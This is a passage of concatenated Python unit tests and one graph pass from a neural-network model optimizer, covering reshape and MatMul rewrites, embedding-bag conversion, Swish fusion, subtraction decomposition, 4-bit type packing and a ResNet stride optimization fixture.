]
)
def test_reshape_on_the_A_input(self,
in1_shape, in2_shape, reshape_pattern, transpose_a, transpose_b, updated_pattern):
nodes = {
**regular_op_with_shaped_data('in_1', in1_shape, dict(type='Parameter', op='Parameter')),
**regular_op_with_shaped_data('in_2', in2_shape, dict(type='Parameter', op='Parameter')),
**valued_const_with_data('dim', int64_array(reshape_pattern)),
**op_with_empty_data('reshape',
dict(type='Reshape', op='Reshape', infer=Reshape.infer, need_shape_inference=True)),
**op_with_empty_data('matmul',
dict(type='MatMul', op='MatMul', infer=MatMul.infer, need_shape_inference=True,
transpose_a=transpose_a, transpose_b=transpose_b, dim_attrs={})),
**result(),
}
edges = [
*connect('in_1:0', '0:reshape'),
*connect('dim:0', '1:reshape'),
*connect('reshape:0', '0:matmul'),
*connect('in_2:0', '1:matmul'),
*connect('matmul:0', 'output'),
]
graph = build_graph(nodes_attrs=nodes, edges=edges, cli=Namespace(static_shape=True))
graph.clean_up()
SmartReshape_HC_Reshape_MatMul().find_and_replace_pattern(graph)
graph.clean_up()
graph_ref = build_graph(nodes_attrs=nodes, edges=edges, update_attributes={
'dim': {'value': int64_array(updated_pattern)}, 'dim_d': {'value': int64_array(updated_pattern)}})
graph_ref.clean_up()
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
@generate(*[
([20, 30], [1, 30, 40], [-1, 40], False, False, [30, -1]),
([20, 30], [1, 40, 30], [40, -1], False, True, [-1, 30]),
([30, 20], [1, 30, 40], [-1, 40], True, False, [30, -1]),
([30, 20], [1, 40, 30], [40, -1], True, True, [-1, 30]),
])
def test_reshape_on_the_B_input(self,
in1_shape, in2_shape, reshape_pattern, transpose_a, transpose_b, updated_pattern):
nodes = {
**regular_op_with_shaped_data('in_1', in1_shape, dict(type='Parameter', op='Parameter')),
**regular_op_with_shaped_data('in_2', in2_shape, dict(type='Parameter', op='Parameter')),
**valued_const_with_data('dim', int64_array(reshape_pattern)),
**op_with_empty_data('reshape',
dict(type='Reshape', op='Reshape', infer=Reshape.infer, need_shape_inference=True)),
**op_with_empty_data('matmul',
dict(type='MatMul', op='MatMul', infer=MatMul.infer, need_shape_inference=True,
transpose_a=transpose_a, transpose_b=transpose_b, dim_attrs={})),
**result(),
}
edges = [
*connect('in_1:0', '0:matmul'),
*connect('in_2:0', '0:reshape'),
*connect('dim:0', '1:reshape'),
*connect('reshape:0', '1:matmul'),
*connect('matmul:0', 'output'),
]
graph = build_graph(nodes_attrs=nodes, edges=edges, cli=Namespace(static_shape=True))
graph.clean_up()
SmartReshape_HC_Reshape_MatMul().find_and_replace_pattern(graph)
graph.clean_up()
graph_ref = build_graph(nodes_attrs=nodes, edges=edges, update_attributes={
'dim': {'value': int64_array(updated_pattern)}, 'dim_d': {'value': int64_array(updated_pattern)}})
graph_ref.clean_up()
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
```
#### File: extensions/front/ATenToEmbeddingBag_test.py
```python
import unittest
import numpy as np
from extensions.front.ATenToEmbeddingBag import AtenToEmbeddingBag
from mo.front.common.partial_infer.utils import int64_array
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph, result, \
regular_op, const
class AtenToEmbeddingBagTest(unittest.TestCase):
def test(self):
nodes = {
**const('weights_inp', np.random.randn(100, 2)),
**regular_op('indices_inp', {'type': 'Parameter'}),
**regular_op('offsets_inp', {'type': 'Parameter'}),
**regular_op('aten', {'type': None, 'kind': 'op', 'op': 'ATen', 'operator': 'embedding_bag', 'mode': 0,
'name': 'my_aten'}),
**regular_op('emb_bag', {'type': 'EmbeddingBagOffsetsSum', 'kind': 'op', 'op': 'EmbeddingBagOffsetsSum'}),
**result('result'),
}
edges = [('weights_inp', 'aten'),
('indices_inp', 'aten'),
('offsets_inp', 'aten'),
('aten', 'result'),
]
graph = build_graph(nodes, edges)
graph.graph['layout'] = 'NCHW'
graph.stage = 'front'
edges_ref = [('weights_inp', 'emb_bag'),
('indices_inp', 'emb_bag'),
('offsets_inp', 'emb_bag'),
('emb_bag', 'result'),
]
graph_ref = build_graph(nodes, edges_ref)
AtenToEmbeddingBag().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
def test_packed(self):
nodes = {
**const('weights_inp', np.random.randn(100, 4)),
**regular_op('indices_inp', {'type': 'Parameter'}),
**regular_op('aten', {'type': None, 'kind': 'op', 'op': 'ATen', 'operator': 'embedding_bag', 'mode': 0,
'name': 'my_aten'}),
**regular_op('emb_bag', {'type': 'EmbeddingBagPackedSum', 'kind': 'op',
'op': 'EmbeddingBagPackedSum'}),
**result('result'),
}
edges = [('weights_inp', 'aten'),
('indices_inp', 'aten'),
('aten', 'result'),
]
graph = build_graph(nodes, edges)
graph.graph['layout'] = 'NCHW'
graph.stage = 'front'
edges_ref = [('weights_inp', 'emb_bag'),
('indices_inp', 'emb_bag'),
('emb_bag', 'result'),
]
graph_ref = build_graph(nodes, edges_ref)
AtenToEmbeddingBag().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
def test_per_sample_weights(self):
nodes = {
**const('weights_inp', np.random.randn(100, 2)),
**regular_op('indices_inp', {'type': 'Parameter'}),
**regular_op('offsets_inp', {'type': 'Parameter'}),
**regular_op('per_sample_weights', {'type': 'Parameter'}),
**regular_op('aten', {'type': None, 'kind': 'op', 'op': 'ATen', 'operator': 'embedding_bag', 'mode': 0,
'name': 'my_aten'}),
**regular_op('emb_bag', {'type': 'EmbeddingBagOffsetsSum', 'kind': 'op',
'op': 'EmbeddingBagOffsetsSum'}),
**regular_op('WeightsRank', {'type': None, 'kind': 'op', 'op': 'Rank'}),
**regular_op('WeightsRank/axis', {'type': 'Add', 'kind': 'op', 'op': 'Add'}),
**regular_op('gather1', {'type': 'Gather', 'kind': 'op', 'op': 'Gather'}),
**regular_op('gather2', {'type': 'Gather', 'kind': 'op', 'op': 'Gather'}),
**regular_op('WeightsShape', {'type': 'ShapeOf', 'kind': 'op', 'op': 'ShapeOf'}),
**regular_op('Broadcast', {'type': 'Broadcast', 'kind': 'op', 'op': 'Broadcast'}),
**regular_op('Unsqueeze', {'type': 'Unsqueeze', 'kind': 'op', 'op': 'Unsqueeze'}),
**const('WeightsShape/Axis', int64_array(0)),
**const('zero1', int64_array(0)),
**const('zero2', int64_array(0)),
**const('Unsqueeze/value', int64_array(0)),
**const('Broadcast/value', int64_array(0)),
**const('neg', int64_array(-1)),
**regular_op('Concat', {'type': 'Concat', 'kind': 'op', 'op': 'Concat'}),
**result('result'),
}
edges = [('weights_inp', 'aten'),
('indices_inp', 'aten'),
('offsets_inp', 'aten'),
('per_sample_weights', 'aten'),
('aten', 'result'),
]
graph = build_graph(nodes, edges, nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph.stage = 'front'
edges_ref = [('weights_inp', 'Concat', {'in': 0, 'out': 0}),
('weights_inp', 'WeightsShape', {'in': 0, 'out': 0}),
('weights_inp', 'WeightsRank', {'in': 0, 'out': 0}),
('WeightsRank', 'WeightsRank/axis'),
('neg', 'WeightsRank/axis'),
('WeightsShape', 'gather1', {'in': 0, 'out': 0}),
('WeightsRank/axis', 'gather1'),
('WeightsShape/Axis', 'gather1'),
('WeightsShape', 'gather2', {'in': 0, 'out': 0}),
('zero1', 'gather2'),
('zero2', 'gather2'),
('Broadcast/value', 'Broadcast'),
('gather1', 'Broadcast'),
('Broadcast', 'Unsqueeze'),
('Unsqueeze/value', 'Unsqueeze'),
('Unsqueeze', 'Concat'),
('Concat', 'emb_bag'),
('indices_inp', 'emb_bag'),
('offsets_inp', 'emb_bag'),
('gather2', 'emb_bag'),
('per_sample_weights', 'emb_bag'),
('emb_bag', 'result'),
]
graph_ref = build_graph(nodes, edges_ref, nodes_with_edges_only=True)
AtenToEmbeddingBag().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
```
#### File: front/kaldi/set_ports.py
```python
from mo.front.common.replacement import FrontReplacementSubgraph
from mo.graph.graph import Node, Graph
class SetPortsPattern(FrontReplacementSubgraph):
"""
Pass used to set ports for loaded graph for Kaldi
"""
enabled = True
def run_before(self):
from extensions.front.restore_ports import RestorePorts
return [RestorePorts]
def run_after(self):
from extensions.load.loader import LoadFinish
return [LoadFinish]
def find_and_replace_pattern(self, graph: Graph):
graph.stage = 'front'
for node_id in graph.nodes(data=False):
node = Node(graph, node_id)
inputs = node.get_sorted_inputs()
outputs = node.get_sorted_outputs()
in_ports_count = node.in_ports_count if node.has_valid('in_ports_count') else len(inputs)
out_ports_count = node.out_ports_count if node.has_valid('out_ports_count') else len(outputs)
node['_in_ports'] = {}
node['_out_ports'] = {}
if in_ports_count is not None:
for idx in range(in_ports_count):
node.add_input_port(idx=idx)
if out_ports_count is not None:
for idx in range(out_ports_count):
node.add_output_port(idx=idx)
idx = 0
for in_node_id, edge_attrs in inputs:
graph.remove_edge(in_node_id, node_id)
if len(Node(graph, in_node_id).out_ports()) == 0:
Node(graph, in_node_id).add_output_port(0)
in_node = Node(graph, in_node_id)
in_node.out_port(edge_attrs['out']).connect(node.in_port(idx))
# need to keep this attribute in edge for correct .mapping file generation and
# for generation of "names" field in IR
in_node.out_edge(edge_attrs['out'])['fw_tensor_debug_info'] = edge_attrs['fw_tensor_debug_info']
if idx < in_ports_count - 1:
idx = idx + 1
idx = 0
for out_node_id, edge_attrs in outputs:
graph.remove_edge(node_id, out_node_id)
if len(Node(graph, out_node_id).in_ports()) == 0:
Node(graph, out_node_id).add_input_port(0)
node.out_port(idx).connect(Node(graph, out_node_id).in_port(edge_attrs['in']))
# need to keep this attribute in edge for correct .mapping file generation and
# for generation of "names" field in IR
node.out_edge(idx)['fw_tensor_debug_info'] = edge_attrs['fw_tensor_debug_info']
if idx < out_ports_count - 1:
idx = idx + 1
```
#### File: front/mxnet/gluoncv_ssd_anchors_test.py
```python
import numpy as np
import unittest
from extensions.front.mxnet.gluoncv_ssd_anchors import SsdAnchorsReplacer
from mo.front.common.partial_infer.utils import int64_array
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph
nodes_attributes = {
'slice_like': {'kind': 'op', 'op': 'slice_like'},
'model_reshape0': {'kind': 'op', 'op': 'Reshape'},
'model_reshape0_const': {'kind': 'op', 'op': 'Const', 'value': int64_array([1, -1, 4])},
'model_reshape1': {'kind': 'op', 'op': 'Reshape'},
'model_reshape1_const': {'kind': 'op', 'op': 'Const', 'value': int64_array([1, -1, 4])},
'model_reshape2': {'kind': 'op', 'op': 'Reshape'},
'model_reshape2_const': {'kind': 'op', 'op': 'Const', 'value': int64_array([1, -1])},
'reshape0': {'kind': 'op', 'op': 'Reshape'},
'reshape0_const': {'kind': 'op', 'op': 'Const', 'value': int64_array([1, -1])},
'concat': {'kind': 'op', 'op': 'Concat'},
'reshape1': {'kind': 'op', 'op': 'Reshape'},
'reshape1_const': {'kind': 'op', 'op': 'Const', 'value': int64_array([1, 2, -1])},
'split': {'kind': 'op', 'op': 'Split', 'num_splits': 2},
'split_const': {'kind': 'op', 'op': 'Const', 'value': int64_array(1)},
'reshape2': {'kind': 'op', 'op': 'Reshape'},
'reshape2_const': {'kind': 'op', 'op': 'Const', 'value': int64_array([-1, 4])},
'value': {'kind': 'op', 'op': 'Split', 'num_splits': 4},
'value_const': {'kind': 'op', 'op': 'Const', 'value': int64_array(1)},
'div_1': {'kind': 'op', 'op': 'Div'},
'div_1_const': {'kind': 'op', 'op': 'Const', 'value': np.array([2], dtype=np.float32)},
'div_2': {'kind': 'op', 'op': 'Div'},
'div_2_const': {'kind': 'op', 'op': 'Const', 'value': np.array([2], dtype=np.float32)},
'xmin': {'kind': 'op', 'op': 'Sub'},
'ymin': {'kind': 'op', 'op': 'Sub'},
'xmax': {'kind': 'op', 'op': 'Add'},
'ymax': {'kind': 'op', 'op': 'Add'},
'concat_value': {'kind': 'op', 'op': 'Concat', 'axis': 1},
'reshape3': {'kind': 'op', 'op': 'Reshape'},
'reshape3_const': {'kind': 'op', 'op': 'Const', 'value': int64_array([1, 1, -1])},
'end_concat': {'kind': 'op', 'op': 'Concat'},
'detection_output': {'kind': 'op', 'op': 'DetectionOutput'}
}
class SsdAnchorsReplacerTest(unittest.TestCase):
def test_replacer(self):
graph = build_graph(
nodes_attrs=nodes_attributes,
edges=[
('slice_like', 'model_reshape0', {'in': 0}),
('model_reshape0_const', 'model_reshape0', {'in': 1}),
('model_reshape0', 'model_reshape1', {'in': 0}),
('model_reshape1_const', 'model_reshape1', {'in': 1}),
('model_reshape1', 'model_reshape2', {'in': 0}),
('model_reshape2_const', 'model_reshape2', {'in': 1}),
('model_reshape2', 'reshape0', {'in': 0}),
('reshape0_const', 'reshape0', {'in': 1}),
('reshape0', 'concat'),
('concat', 'detection_output', {'in': 2})
],
nodes_with_edges_only=True
)
ref_graph = build_graph(
nodes_attrs=nodes_attributes,
edges=[
('slice_like', 'model_reshape0', {'in': 0}),
('model_reshape0_const', 'model_reshape0', {'in': 1}),
('model_reshape0', 'model_reshape1', {'in': 0}),
('model_reshape1_const', 'model_reshape1', {'in': 1}),
('model_reshape1', 'model_reshape2', {'in': 0}),
('model_reshape2_const', 'model_reshape2', {'in': 1}),
('model_reshape2', 'reshape0', {'in': 0}),
('reshape0_const', 'reshape0', {'in': 1}),
('reshape0', 'concat'),
('concat', 'reshape1', {'in': 0}),
('reshape1_const', 'reshape1', {'in': 1}),
('reshape1', 'split', {'in': 0}),
('split_const', 'split', {'in': 1}),
('split', 'reshape2', {'out': 0, 'in': 0}),
('reshape2_const', 'reshape2', {'in': 1}),
('reshape2', 'value', {'in': 0}),
('value_const', 'value', {'in': 1}),
('value', 'xmin', {'out': 0, 'in': 0}),
('value', 'ymin', {'out': 1, 'in': 0}),
('value', 'xmax', {'out': 0, 'in': 1}),
('value', 'ymax', {'out': 1, 'in': 1}),
('value', 'div_1', {'out': 2, 'in': 0}),
('value', 'div_2', {'out': 3, 'in': 0}),
('div_1_const', 'div_1', {'in': 1}),
('div_2_const', 'div_2', {'in': 1}),
('div_1', 'xmin', {'in': 1, 'out': 0}),
('div_1', 'xmax', {'in': 0, 'out': 0}),
('div_2', 'ymin', {'in': 1, 'out': 0}),
('div_2', 'ymax', {'in': 0, 'out': 0}),
('xmin', 'concat_value', {'in': 0}),
('ymin', 'concat_value', {'in': 1}),
('xmax', 'concat_value', {'in': 2}),
('ymax', 'concat_value', {'in': 3}),
('concat_value', 'reshape3', {'in': 0}),
('reshape3_const', 'reshape3', {'in': 1}),
('reshape3', 'end_concat', {'in': 0}),
('split', 'end_concat', {'in': 1}),
('end_concat', 'detection_output', {'in': 2})
],
update_attributes={
'concat': {'axis': 1}
},
nodes_with_edges_only=True
)
graph.stage = 'front'
graph.graph['cmd_params'].data_type = 'FP32'
SsdAnchorsReplacer().find_and_replace_pattern(graph)
flag, resp = compare_graphs(graph, ref_graph, 'detection_output', check_op_attrs=True)
self.assertTrue(flag, resp)
```
#### File: front/mxnet/ssd_pattern_remove_flatten_test.py
```python
import unittest
from extensions.front.mxnet.ssd_pattern_remove_flatten import SsdPatternRemoveFlatten
from mo.graph.graph import Node
from mo.utils.unittest.graph import build_graph
class TestSsdPatternRemoveFlatten(unittest.TestCase):
def test_pattern_remove_transpose(self):
graph = build_graph({'node_1': {'type': 'Identity', 'kind': 'op', 'op': 'Parameter'},
'node_2': {'type': 'Identity', 'kind': 'op'},
'node_multi_box_prior': {'type': '_contrib_MultiBoxPrior', 'kind': 'op',
'op': '_contrib_MultiBoxPrior'},
'node_flatten': {'type': 'Flatten', 'kind': 'op', 'op': 'Flatten'},
'node_3': {'type': 'Identity', 'kind': 'op'},
},
[('node_1', 'node_2'),
('node_2', 'node_multi_box_prior'),
('node_multi_box_prior', 'node_flatten'),
('node_flatten', 'node_3'), ],
)
pattern = SsdPatternRemoveFlatten()
pattern.find_and_replace_pattern(graph)
self.assertFalse(graph.has_node('node_flatten'))
self.assertTrue(graph.has_edge(Node(graph, 'node_multi_box_prior').id, Node(graph, 'node_3').id))
```
#### File: extensions/front/sub_test.py
```python
import unittest
import numpy as np
from extensions.front.sub import Sub
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph, result, regular_op_with_shaped_data, valued_const_with_data, connect, \
connect_data
nodes = {
**regular_op_with_shaped_data('placeholder_1', [1, 227, 227, 3], {'type': 'Parameter'}),
**regular_op_with_shaped_data('placeholder_2', [1, 227, 227, 3], {'type': 'Parameter'}),
**regular_op_with_shaped_data('sub', None, {'op': 'Sub', 'type': 'Subtract', 'name': 'my_sub'}),
**regular_op_with_shaped_data('negate', [1, 227, 227, 3], {'type': 'Multiply'}),
**valued_const_with_data('minus_one', np.array(-1.)),
**regular_op_with_shaped_data('add', None, {'type': 'Add'}),
**result(),
}
class TestSub(unittest.TestCase):
def test_sub_test_1(self):
# Test with two different inputs from two placeholders
graph = build_graph(nodes, [
*connect('placeholder_1', '0:sub'),
*connect('placeholder_2', '1:sub'),
*connect('sub', 'output'),
], nodes_with_edges_only=True)
Sub().find_and_replace_pattern(graph)
graph_ref = build_graph(nodes, [
*connect('placeholder_1', '0:add'),
*connect('placeholder_2', '0:negate'),
*connect('minus_one', '1:negate'),
*connect('negate', '1:add'),
*connect('add', 'output'),
], nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
self.assertTrue(graph.node[graph.get_nodes_with_attributes(type='Add')[0]]['name'] == 'my_sub')
def test_sub_test_2(self):
# Test with two same inputs from one placeholder
graph = build_graph(nodes, [
*connect('placeholder_1:0', '0:sub'),
*connect_data('placeholder_1:0', '1:sub'),
*connect('sub', 'output'),
], nodes_with_edges_only=True)
Sub().find_and_replace_pattern(graph)
graph_ref = build_graph(nodes, [
*connect('placeholder_1:0', '0:add'),
*connect_data('placeholder_1:0', '0:negate'),
*connect('minus_one', '1:negate'),
*connect('negate', '1:add'),
*connect('add', 'output'),
], nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
self.assertTrue(graph.node[graph.get_nodes_with_attributes(type='Add')[0]]['name'] == 'my_sub')
```
#### File: extensions/front/Swish_fusion_test.py
```python
import unittest
from extensions.front.Swish_fusion import SwishWithSigmoidWithoutBeta, SwishWithSigmoidWithBeta
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph, regular_op, result, build_graph_with_edge_attrs
ref_nodes = {**regular_op('input', {'type': 'Parameter'}),
**regular_op('swish', {'type': 'Swish', 'name': 'final_mul'}),
**result('result')
}
ref_edges = [('input', 'swish'), ('swish', 'result')]
class SwishWithSigmoidWithoutBetaTest(unittest.TestCase):
nodes = {
**regular_op('input', {'type': 'Parameter'}),
**regular_op('sigmoid', {'op': 'Sigmoid'}),
**regular_op('mul', {'op': 'Mul', 'name': 'final_mul'}),
**result('result'),
}
edges = [('input', 'mul', {'in': 0, 'out': 0}),
('input', 'sigmoid', {'in': 0, 'out': 0}),
('sigmoid', 'mul', {'in': 1, 'out': 0}),
('mul', 'result', {'in': 0, 'out': 0})]
def test_swish_with_sigmoid_without_beta_test(self):
graph = build_graph_with_edge_attrs(self.nodes, self.edges, {})
graph_ref = build_graph(ref_nodes, ref_edges)
graph.stage = 'front'
SwishWithSigmoidWithoutBeta().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
self.assertTrue(len(graph.get_op_nodes(name='final_mul')) == 1 and
graph.get_op_nodes(name='final_mul')[0].op == 'Swish')
def test_swish_with_sigmoid_without_beta_different_tensors(self):
graph = build_graph_with_edge_attrs({
**regular_op('input', {'type': 'Parameter'}),
**regular_op('input_2', {'type': 'Parameter'}),
**regular_op('sigmoid', {'op': 'Sigmoid'}),
**regular_op('mul', {'op': 'Mul', 'name': 'final_mul'}),
**result('result'),
}, [('input_2', 'mul', {'in': 0, 'out': 0}),
('input', 'sigmoid', {'in': 0, 'out': 0}),
('sigmoid', 'mul', {'in': 1, 'out': 0}),
('mul', 'result', {'in': 0, 'out': 0})], {})
graph_ref = graph.copy()
graph.stage = 'front'
SwishWithSigmoidWithoutBeta().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
class SwishWithSigmoidWithBetaTest(unittest.TestCase):
nodes = {
**regular_op('input', {'type': 'Parameter'}),
**regular_op('beta', {'type': 'Parameter'}),
**regular_op('mul_beta', {'op': 'Mul'}),
**regular_op('sigmoid', {'op': 'Sigmoid'}),
**regular_op('mul_2', {'op': 'Mul', 'name': 'final_mul'}),
**result('result'),
}
edges = [('input', 'mul_beta', {'in': 0, 'out': 0}),
('input', 'mul_2', {'in': 0, 'out': 0}),
('beta', 'mul_beta', {'in': 1, 'out': 0}),
('mul_beta', 'sigmoid', {'in': 0, 'out': 0}),
('sigmoid', 'mul_2', {'in': 1, 'out': 0}),
('mul_2', 'result', {'in': 0, 'out': 0})]
def test_swish_with_sigmoid_with_beta_test(self):
graph = build_graph_with_edge_attrs(self.nodes, self.edges, {})
new_ref_nodes = ref_nodes.copy()
new_ref_nodes.update(**regular_op('beta', {'type': 'Parameter'}))
graph_ref = build_graph(new_ref_nodes, ref_edges + [('beta', 'swish')])
graph.stage = 'front'
SwishWithSigmoidWithBeta().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
self.assertTrue(len(graph.get_op_nodes(name='final_mul')) == 1 and
graph.get_op_nodes(name='final_mul')[0].op == 'Swish')
def test_swish_with_sigmoid_with_beta_different_tensors(self):
graph = build_graph_with_edge_attrs({
**regular_op('input', {'type': 'Parameter'}),
**regular_op('input_2', {'type': 'Parameter'}),
**regular_op('beta', {'type': 'Parameter'}),
**regular_op('mul_beta', {'op': 'Mul'}),
**regular_op('sigmoid', {'op': 'Sigmoid'}),
**regular_op('mul_2', {'op': 'Mul', 'name': 'final_mul'}),
**result('result'),
}, [('input', 'mul_beta', {'in': 0, 'out': 0}),
('input_2', 'mul_2', {'in': 0, 'out': 0}),
('beta', 'mul_beta', {'in': 1, 'out': 0}),
('mul_beta', 'sigmoid', {'in': 0, 'out': 0}),
('sigmoid', 'mul_2', {'in': 1, 'out': 0}),
('mul_2', 'result', {'in': 0, 'out': 0})], {})
graph_ref = graph.copy()
graph.stage = 'front'
SwishWithSigmoidWithBeta().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
```
#### File: extensions/ops/cast_test.py
```python
import numpy as np
import unittest
from generator import generator, generate
from extensions.ops.Cast import Cast
from mo.middle.passes.convert_data_type import packed_U4, packed_I4
from mo.middle.passes.infer import partial_infer
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import valued_const_with_data, regular_op_with_empty_data, \
result, build_graph, connect
nodes = lambda value, dst_type: {
**valued_const_with_data('value', np.array(value)),
**regular_op_with_empty_data('convert', {'dst_type': dst_type, 'infer': Cast.infer}),
**result(),
}
@generator
class CastTest(unittest.TestCase):
"""
Example of checking:
7 == 0111, padded to 0111 0000, results in 112
7 == 0111, 8 == 1000 packed to 0111 1000, results in 120
-8 == 1000, padded to 1000 0000, results in 128
"""
@generate(*[
([0], [0], packed_U4),
([1], [16], packed_U4),
([2], [32], packed_U4),
([3], [48], packed_U4),
([4], [64], packed_U4),
([5], [80], packed_U4),
([6], [96], packed_U4),
([7], [112], packed_U4),
([8], [128], packed_U4),
([9], [144], packed_U4),
([10], [160], packed_U4),
([11], [176], packed_U4),
([12], [192], packed_U4),
([13], [208], packed_U4),
([14], [224], packed_U4),
([15], [240], packed_U4),
([0, 15], [15], packed_U4),
([1, 14], [30], packed_U4),
([2, 13], [45], packed_U4),
([3, 12], [60], packed_U4),
([4, 11], [75], packed_U4),
([5, 10], [90], packed_U4),
([6, 9], [105], packed_U4),
([7, 8], [120], packed_U4),
([8, 7], [135], packed_U4),
([9, 6], [150], packed_U4),
([10, 5], [165], packed_U4),
([11, 4], [180], packed_U4),
([12, 3], [195], packed_U4),
([13, 2], [210], packed_U4),
([14, 1], [225], packed_U4),
([15, 0], [240], packed_U4),
([-8], [128], packed_I4),
([-7], [144], packed_I4),
([-6], [160], packed_I4),
([-5], [176], packed_I4),
([-4], [192], packed_I4),
([-3], [208], packed_I4),
([-2], [224], packed_I4),
([-1], [240], packed_I4),
([0], [0], packed_I4),
([1], [16], packed_I4),
([2], [32], packed_I4),
([3], [48], packed_I4),
([4], [64], packed_I4),
([5], [80], packed_I4),
([6], [96], packed_I4),
([7], [112], packed_I4),
([-8, 7], [135], packed_I4),
([-7, 6], [150], packed_I4),
([-6, 5], [165], packed_I4),
([-5, 4], [180], packed_I4),
([-4, 3], [195], packed_I4),
([-3, 2], [210], packed_I4),
([-2, 1], [225], packed_I4),
([-1, 0], [240], packed_I4),
([0, -1], [15], packed_I4),
([1, -2], [30], packed_I4),
([2, -3], [45], packed_I4),
([3, -4], [60], packed_I4),
([4, -5], [75], packed_I4),
([5, -6], [90], packed_I4),
([6, -7], [105], packed_I4),
([7, -8], [120], packed_I4),
])
def test_custom_value_propagation(self, value, expected, custom_dtype):
graph = build_graph(nodes(value, custom_dtype), [
*connect('value', 'convert'), *connect('convert', 'output'),
])
partial_infer(graph)
graph_ref = build_graph(nodes(value, custom_dtype), [
*connect('value', 'convert'), *connect('convert', 'output')],
{'convert_d': {'force_type': custom_dtype, 'force_shape': np.array(value).shape,
'value': expected}})
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
```
#### File: passes/fusing/resnet_optimization_test.py
```python
import unittest
import numpy as np
from mo.front.common.partial_infer.elemental import copy_shape_infer
from mo.front.common.partial_infer.eltwise import eltwise_infer
from mo.middle.passes.fusing.resnet_optimization import stride_optimization
from mo.ops.convolution import Convolution
from mo.ops.pooling import Pooling
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph
max_elt_lambda = lambda node: eltwise_infer(node, lambda a, b: np.maximum(a, b))
nodes_attributes = {
# Placeholders
'placeholder_1': {'shape': None, 'type': 'Parameter', 'kind': 'op', 'op': 'Parameter'},
'placeholder_1_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
# Concat1 operation
'eltwise_1': {'type': 'Maximum', 'kind': 'op', 'op': 'Maximum', 'infer': max_elt_lambda},
'eltwise_1_data': {'name': 'eltwise_1_data', 'value': None, 'shape': None, 'kind': 'data'},
# Convolutions
'conv_1': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
'spatial_dims': np.array([2, 3]),
'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'dilation': np.array([1, 1, 1, 1]),
'batch_dims': np.array([0]), 'infer': Convolution.infer,
'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
'output_feature_channel': 0, },
'conv_1_w': {'value': None, 'shape': None, 'kind': 'data',
'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
'conv_1_b': {'value': None, 'shape': None, 'kind': 'data'},
'conv_1_data': {'value': None, 'shape': None, 'kind': 'data'},
'conv_2': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
'spatial_dims': np.array([2, 3]),
'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'dilation': np.array([1, 1, 1, 1]),
'batch_dims': np.array([0]), 'infer': Convolution.infer,
'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
'output_feature_channel': 0, },
'conv_2_w': {'value': None, 'shape': None, 'kind': 'data',
'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
'conv_2_b': {'value': None, 'shape': None, 'kind': 'data'},
'conv_2_data': {'value': None, 'shape': None, 'kind': 'data'},
'conv_3': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
'spatial_dims': np.array([2, 3]),
'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'dilation': np.array([1, 1, 1, 1]),
'batch_dims': np.array([0]), 'infer': Convolution.infer,
'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
'output_feature_channel': 0, },
'conv_3_w': {'value': None, 'shape': None, 'kind': 'data',
'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
'conv_3_b': {'value': None, 'shape': None, 'kind': 'data'},
'conv_3_data': {'value': None, 'shape': None, 'kind': 'data'},
'conv_4': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
'spatial_dims': np.array([2, 3]),
'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'dilation': np.array([1, 1, 1, 1]),
'batch_dims': np.array([0]), 'infer': Convolution.infer,
'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
'output_feature_channel': 0, },
